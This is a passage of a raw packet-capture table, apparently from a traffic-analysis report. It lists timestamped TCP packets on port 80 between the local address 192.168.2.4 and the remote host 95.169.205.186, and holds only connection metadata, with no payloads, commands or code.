                                                              Jul 6, 2024 04:21:59.383265018 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383306026 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383315086 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.383316040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383337975 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.383352995 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.383435011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383445024 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383450031 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383455038 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383479118 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.383507013 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.383610010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383652925 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.383661985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383707047 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.383721113 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383730888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383740902 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383750916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383766890 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.383795977 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.383958101 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383968115 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.383979082 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.384001970 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.384015083 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.384182930 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.384231091 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.384231091 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.384242058 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.384264946 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.384277105 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.384351969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.384361982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.384372950 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.384383917 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.384387016 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.384407997 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.384428978 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.384601116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.384644985 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.385289907 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.385322094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.385330915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.385333061 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.385356903 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.385369062 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.385452986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.385464907 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.385474920 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.385484934 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.385499001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.385528088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.385643005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.385685921 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.448980093 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.448999882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.449009895 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.449074984 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.449103117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.449110031 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.449141979 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.449146986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.449157953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.449168921 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.449179888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.449182034 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.449197054 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.449217081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.458710909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.458761930 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.458795071 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.458806038 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.458833933 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.458852053 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.458924055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.458935022 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.458944082 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.458955050 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.458965063 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.458967924 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.458978891 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.459017992 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460365057 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460411072 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460427046 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460437059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460447073 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460469007 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460500956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460520983 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460566998 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460586071 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460627079 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460685015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460695982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460728884 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460813046 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460823059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460833073 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460841894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460853100 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460853100 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460870028 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460874081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.460896015 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.460923910 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.461060047 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.461071014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.461122990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.461147070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.461186886 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.461620092 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.461628914 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.461662054 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.461682081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.461720943 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.461781025 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.461791039 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.461801052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.461826086 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.461850882 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462023020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462034941 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462044001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462054968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462065935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462065935 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462075949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462091923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462106943 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462299109 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462315083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462325096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462333918 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462353945 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462369919 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462507963 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462519884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462529898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462541103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462557077 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462583065 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462697983 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462709904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462718964 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462728024 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462740898 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462754965 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.462958097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462969065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462977886 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462987900 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.462999105 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463001966 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463010073 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463022947 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463028908 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463033915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463042974 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463068962 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463083029 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463326931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463337898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463346958 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463357925 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463370085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463375092 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463381052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463398933 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463417053 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463562012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463604927 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463628054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463644028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463654995 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463665009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463668108 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463689089 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463713884 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463923931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463938951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463948965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463959932 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.463968992 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.463984013 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.464014053 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.472775936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.472824097 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.472856045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.472867012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.472903967 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.473037958 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.473047972 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.473057985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.473071098 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.473083019 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.473093987 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.473119020 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.473145962 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.473180056 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.473886013 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.473927975 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.473932981 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.473938942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.473965883 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.473978043 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.474011898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.474021912 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.474030972 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.474040985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.474054098 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.474081039 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.474137068 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.474178076 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475176096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475186110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475197077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475224018 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475244999 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475260973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475300074 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475307941 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475317955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475327969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475347042 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475359917 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475533962 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475544930 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475555897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475565910 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475577116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475583076 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475590944 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475590944 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475603104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475619078 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475641012 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.475965023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475976944 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475986004 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.475996971 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476006985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476010084 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.476018906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476028919 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.476033926 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476041079 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.476068020 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.476305008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476319075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476347923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.476366043 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.476418018 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476433039 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476442099 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476465940 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.476495028 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.476519108 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476530075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476540089 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476550102 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.476566076 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.476589918 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.548310995 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.548353910 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.548437119 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.548449993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.548471928 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.548487902 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.548515081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.548527002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.548537970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.548549891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.548553944 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.548568010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.548572063 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.548588037 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.548612118 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.549463034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.549474001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.549484968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.549514055 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.549527884 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.549546957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.549608946 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.549673080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.549685001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.549695015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.549707890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.549722910 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.549743891 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.550652981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.550692081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.550703049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.550715923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.550729036 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.550749063 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.550885916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.550898075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.550909042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.550920010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.550939083 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.550966024 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.551070929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551083088 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551095009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551105976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551120043 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.551141977 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.551299095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551311016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551321983 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551345110 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.551378965 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.551783085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551817894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551830053 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551831961 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.551867962 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.551867962 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.551971912 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551984072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.551999092 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.552011013 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.552021980 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.552035093 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.552057981 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.552125931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.552162886 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.552172899 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.552203894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.552206039 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.552217007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.552229881 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.552241087 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.552242041 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.552256107 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.552279949 CEST4973080192.168.2.495.169.205.186
